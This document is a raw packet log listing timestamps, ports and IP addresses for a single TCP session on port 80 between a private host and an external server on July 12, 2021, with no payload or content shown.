Jul 12, 2021 10:29:48.001523018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.001553059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.001914978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002130985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002196074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002226114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.002238035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002264023 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.002274990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002300024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002326012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002351046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.002360106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.002392054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.002825022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003072023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003217936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003248930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003274918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003298044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003309965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.003334999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003381014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.003410101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003441095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.003817081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003865004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003892899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003915071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003937006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.003951073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.003978014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.004004002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.004010916 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.004014015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.004035950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.004061937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.004704952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.004740000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.004817009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.004884005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007024050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007055998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007072926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007092953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007132053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007154942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007168055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007191896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007219076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007225037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007244110 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007257938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007281065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007304907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007313967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007337093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007363081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007369995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007391930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007416964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007424116 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007447958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007472038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007484913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007508993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007533073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007544994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007567883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007591009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007600069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007623911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007646084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007673025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007679939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007703066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007713079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007738113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007762909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007771969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007796049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007822037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007827997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.007848978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.007874012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.008430004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008460045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008483887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008508921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008531094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008543968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.008569002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008591890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008615971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.008626938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.008658886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.009146929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009248972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.009298086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009325027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009349108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009373903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009399891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.009411097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009439945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009447098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.009469986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.009494066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.010066986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010101080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010124922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010153055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.010210037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010234118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.010251045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010276079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010303974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010310888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.010333061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.010359049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.010992050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011027098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011050940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011073112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011096001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011109114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.011162043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011188984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011194944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.011219025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011244059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.011902094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011934042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011960030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.011986017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012015104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012022018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.012048006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012073994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012085915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.012109041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012141943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.012744904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012800932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012826920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012855053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012881041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.012907028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012932062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.012943983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.012959957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.013001919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013025999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013345957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.013534069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013585091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013618946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013643980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013665915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013678074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.013701916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013726950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013734102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.013756990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.013781071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.014470100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.014504910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.014533997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.014564037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.014574051 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.014591932 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.014612913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.014637947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.014661074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.014683962 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.014693975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015342951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015379906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.015454054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015479088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015505075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015532970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015541077 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.015564919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015597105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.015620947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015646935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015670061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.015697956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.016392946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016436100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016449928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.016478062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016508102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016514063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.016537905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016561985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.016571045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016593933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016616106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016643047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.016649961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.016668081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.017503977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017539978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017564058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017584085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017607927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017637968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017648935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.017676115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017702103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017709017 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.017735004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.017760992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.018621922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018660069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.018673897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018699884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018723965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018752098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018779993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018788099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.018805981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.018822908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018846989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018874884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.018882036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.018994093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.019263029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019293070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019335985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.019371986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019401073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019424915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019450903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019463062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.019484997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.019496918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019520044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019541979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.019663095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.020181894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020217896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020245075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020330906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.020369053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020536900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020572901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020581007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.020692110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020739079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.020797014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020821095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020845890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020872116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020919085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.020951033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.020989895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.021429062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021461010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021483898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021508932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021585941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021625042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.021683931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021704912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021728992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021750927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.021787882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.022205114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022236109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022259951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022291899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.022329092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022341967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.022399902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022444010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022524118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022555113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.022564888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022593975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.022600889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.022702932 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.023169994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023202896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023230076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023252010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023318052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.023325920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.023348093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023374081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023400068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023423910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023446083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.023458958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.023475885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.024049997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024219990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024255037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024270058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.024296999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024322033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024342060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.024355888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024379015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024400949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024411917 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.024437904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024472952 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.024697065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.024945021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.024991035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025065899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025124073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.025182962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025209904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025248051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025273085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025356054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025382042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025394917 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.025465965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025489092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025501966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.025547981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.025578976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.026047945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026283026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026312113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026324987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.026350975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.026381969 CEST	80	49755	47.254.186.176	192.168.2.3
